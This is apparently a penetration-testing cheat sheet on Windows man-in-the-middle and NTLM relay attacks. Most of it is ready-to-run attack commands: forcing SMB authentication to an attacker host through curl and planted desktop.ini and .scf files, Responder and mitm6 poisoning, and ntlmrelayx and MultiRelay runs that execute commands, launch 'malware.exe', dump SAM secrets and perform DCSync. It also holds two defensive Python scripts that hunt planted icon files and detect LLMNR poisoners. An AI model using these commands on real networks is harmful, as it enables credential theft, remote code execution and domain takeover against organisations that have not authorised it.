MiTM & Relaying Attack

Force NTLM Authentication

To set up an SMB share and make the victim load it in order to capture its hash:

sudo impacket-smbserver {name that you want} . -smb2support

Then load the resource. Examples:

Load our share from a web application, with curl or directly from the browser:

curl -s "http://school.flight.htb/?view=//10.10.14.10/parrotsec" &>/dev/null

Create a malicious icon file that loads our share; if someone loads the icon and logs in, we will have the hash:

[.ShellClassInfo]
IconResource=\\10.10.14.10\parrotsec\

Create a malicious .scf file that loads our share:

[Shell]
Command=2
IconFile=\\10.10.14.4\tools\nc.ico
[Taskbar]
Command=ToggleDesktop

We can also automatically upload a malicious icon that will load our SMB server with the -M slinky module in netexec.
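From the defensive side, the planted desktop.ini and .scf files shown above are easy to hunt for on a share: any icon directive that points at a UNC host outside an allow-list is suspicious. The following is an added example in Python (not the page's own tooling); the trusted-host set is an assumption supplied by the caller, and the hunt is limited to the two file types this section shows.

```python
# Added example (not from the page): hunt a share for planted desktop.ini / .scf files whose
# icon path is a UNC reference to a host we don't trust, i.e. the coercion files shown above.
import configparser, re
from pathlib import Path

UNC_HOST = re.compile(r"\\\\([^\\\s]+)\\")          # host part of \\host\share\...
ICON_KEYS = {"desktop.ini": (".ShellClassInfo", "IconResource"),   # section, key
             ".scf": ("Shell", "IconFile")}

def unc_icon_host(filename: str, text: str):
    """Return the UNC host an icon directive points at, or None if local or absent."""
    kind = "desktop.ini" if filename.lower() == "desktop.ini" else Path(filename).suffix.lower()
    if kind not in ICON_KEYS:
        return None
    cfg = configparser.RawConfigParser(strict=False)
    cfg.optionxform = str                              # keep key case exactly as written
    try:
        cfg.read_string(text)
    except configparser.Error:                         # not INI-shaped: nothing to point anywhere
        return None
    section, key = ICON_KEYS[kind]
    m = UNC_HOST.match(cfg.get(section, key, fallback="").strip())
    return m.group(1).lower() if m else None

def read_ini(path: Path) -> str:
    """Explorer often writes desktop.ini as UTF-16 with a BOM; decode either way."""
    raw = path.read_bytes()
    return raw.decode("utf-16") if raw[:2] in (b"\xff\xfe", b"\xfe\xff") else raw.decode("utf-8", "replace")

def hunt(root: Path, trusted_hosts: set):
    """Walk root and return [(relative path, host)] for icon files aimed at untrusted hosts."""
    findings = []
    for p in root.rglob("*"):
        if p.is_file():
            host = unc_icon_host(p.name, read_ini(p)) if p.suffix.lower() in (".ini", ".scf") else None
            if host and host not in trusted_hosts:
                findings.append((str(p.relative_to(root)), host))
    return sorted(findings)

if __name__ == "__main__":
    import sys
    for rel, host in hunt(Path(sys.argv[1]), {h.lower() for h in sys.argv[2:]}):
        print(f"{rel}: icon loaded from untrusted host {host}")
```

Run it against a mounted share root with the hostnames of your legitimate file servers as the remaining arguments; a hit on the content shown above reports 10.10.14.10 or 10.10.14.4.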

LLMNR, NBT-NS and MDNS

Microsoft systems use Link-Local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service (NBT-NS) for local host resolution when DNS lookups fail. Apple Bonjour and Linux zero-configuration implementations use Multicast DNS (mDNS) to discover systems within a network. These protocols are unauthenticated and broadcast messages over UDP; thus, attackers can exploit them to direct users to malicious services.

Using Responder we can send fake responses and impersonate the services that hosts are looking for.

Responder for Linux: https://github.com/lgandx/Responder - Logs are stored in /usr/share/responder/logs

Responder for Windows: https://github.com/lgandx/Responder-Windows

Inveigh is the C# and PowerShell version: https://github.com/Kevin-Robertson/Inveigh

To start in analysis mode (listen for requests without poisoning):

responder -A

To run it with default features:

responder -I <Iface>

To force NTLM (transparent) or Basic (prompt) authentication for the proxy, enable answers for NetBIOS wredir suffix queries and run verbosely:

responder -I <Iface> -P -r -v

To capture NTLMv1 challenges and responses instead of NTLMv2 (these can be easily cracked: https://book.hacktricks.xyz/windows-hardening/ntlm#ntlmv1-attack):

responder -I <Iface> --lm --disable-ess

To start the WPAD rogue proxy server:

responder -I <Iface> --wpad

Note that the captured hashes are Net-NTLMv2 challenge/responses, not NTLM hashes, so they must be cracked or relayed; pass-the-hash won't work with them.

Once hashes are obtained, to parse them (in /usr/share/responder/logs/) and keep a single entry per user (the first command keeps the first capture for each user, the second keeps the last one):

cat *NTLM* | awk -F'::' '!seen[$1]++'

cat *NTLM* | awk -F'::' '{lines[$1]=$0} END {for (line in lines) print lines[line]}'
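The poisoning described in this section can be detected from the other side with a canary query: ask LLMNR for a random name that no host owns, so any answer at all comes from a poisoner such as Responder. This is an added example, not Responder's code or the page's; the "canary-" prefix and the 2 second timeout are arbitrary choices, and it needs an interface on the segment being checked.

```python
# Added example (not from the page): an LLMNR canary probe that detects a poisoner such as
# Responder by querying a name that no legitimate host on the segment owns.
import os, socket, struct
LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355    # RFC 4795 multicast group and port

def build_llmnr_query(name: str, txid: int) -> bytes:
    """LLMNR A query: 12-byte header (flags 0, QDCOUNT 1) + DNS-style labels + A/IN."""
    qname = b"".join(bytes([len(lab)]) + lab.encode() for lab in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)

def _read_name(data: bytes, off: int):
    """Decode a name, following compression pointers; returns (name, next offset)."""
    labels = []
    while data[off] != 0:
        if data[off] & 0xC0 == 0xC0:                  # pointer to an earlier name
            ptr = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            return ".".join(labels + [_read_name(data, ptr)[0]]), off + 2
        labels.append(data[off + 1:off + 1 + data[off]].decode())
        off += 1 + data[off]
    return ".".join(labels), off + 1

def parse_llmnr_answers(data: bytes, txid: int):
    """Return [(name, ipv4)] for the A records in a response to our txid, else []."""
    rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000:             # wrong ID or not a response
        return []
    off, answers = 12, []
    for _ in range(qd):                                # skip the echoed question(s)
        off = _read_name(data, off)[1] + 4
    for _ in range(an):
        name, off = _read_name(data, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        if rtype == 1 and rdlen == 4:
            answers.append((name, socket.inet_ntoa(data[off + 10:off + 14])))
        off += 10 + rdlen
    return answers

def probe(timeout: float = 2.0):
    """One canary query: a clean segment yields [], a poisoner yields (src ip, name, answer ip)."""
    name, txid = "canary-" + os.urandom(4).hex(), int.from_bytes(os.urandom(2), "big")
    hits = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        try:
            while True:                                # collect every answer until quiet
                data, (src, _) = s.recvfrom(1024)
                hits += [(src, n, ip) for n, ip in parse_llmnr_answers(data, txid)]
        except socket.timeout:
            return hits
```

Running probe() periodically from a monitoring host and alerting on any non-empty result catches a poisoner within seconds of it starting, since Responder answers every name it sees.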

DHCP Poisoning

Windows uses several custom DHCP options, such as NetBIOS, WINS and WPAD settings.

To inject a WPAD server in the DHCP response:

responder -I eth0 -Pdv

NTLM Relay

To do this through a C2, follow steps in NTLM Relaying Methodology w/ Cobalt section.

When combining NTLM relay with Responder for name poisoning, disable Responder's SMB and HTTP servers so they don't interfere with the ntlmrelayx ones:

sed -i 's/SMB = On/SMB = Off/g' /PATH/TO/Responder/Responder.conf
sed -i 's/HTTP = On/HTTP = Off/g' /PATH/TO/Responder/Responder.conf

Additionally, start Responder after ntlmrelayx:

responder -I eth0 --wredir --ProxyAuth

- Check SMB signing (relaying to SMB only works where signing is not required)

crackmapexec smb {IP}

nmap -p445 --script smb2-security-mode {IP} -Pn

To generate a list of possible victims to relay:

crackmapexec smb --gen-relay-list targets.txt $SUBNET

- ntlmrelayx

impacket-ntlmrelayx --no-http-server -smb2support -t smb://{target ip} --no-wcf-server

To execute a command:

impacket-ntlmrelayx --no-http-server -smb2support -t {target ip} -c "ipconfig"

To get a session:

ntlmrelayx.py -tf targets.txt -smb2support -i

To execute a file:

ntlmrelayx.py -tf targets.txt -smb2support -e malware.exe

To dump SAM (remote dump of SAM and LSA):

ntlmrelayx.py -t smb://$TARGET

ntlmrelayx.py -tf targets.txt -smb2support

We can also specify a list of targets with -tf; each line of the targets file should use one of the following formats:

smb://DOMAIN\User@192.168.1.101
smb://User@192.168.1.101
smb://target:port
http://target:port/somepath
ldaps://someserver.domain.lan
someserver.domain.lan

To relay the authentication and open a SOCKS proxy (we can then run tools through the authenticated session with proxychains, using socks4 localhost 1080):

ntlmrelayx.py -tf targets.txt -socks

To enumerate the AD through the authenticated sessions:

ntlmrelayx -t "ldap://domaincontroller" --dump-adcs --dump-laps --dump-gmsa

To perform a DCSync (target domain controller must be vulnerable to Zerologon):

ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER'

ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER' -auth-smb 'DOMAIN'/'LOW_PRIV_USER':'PASSWORD'

If the connections seen in Responder only arrive over HTTP, the targets may have LLMNR, NBT-NS and mDNS disabled, so we can run the tool on that specific HTTP port (disable all Responder servers and start Responder right after the following command). Check which port Responder is receiving on:

sudo impacket-ntlmrelayx -t all://{target} -smb2support --http-port 3128

If we see connections we can try the different ntlmrelayx options (type help), and then do the same replacing all:// with smb:// or ldap:// to execute commands, dump credentials or enumerate the domain.

- mitm6

To perform a relay attack through IPv6:

mitm6 -d domain.com

ntlmrelayx -6 -wh <attacker IP> -t smb://<target IP> --socks -debug -smb2support

- MultiRelay

To relay all users (by default a shell is returned):

python /usr/share/responder/tools/MultiRelay.py -t <IP target> -u ALL

To execute a single command:

python MultiRelay.py -t <IP target> -u ALL -c whoami

To dump hashes:

python MultiRelay.py -t <IP target> -u ALL -d
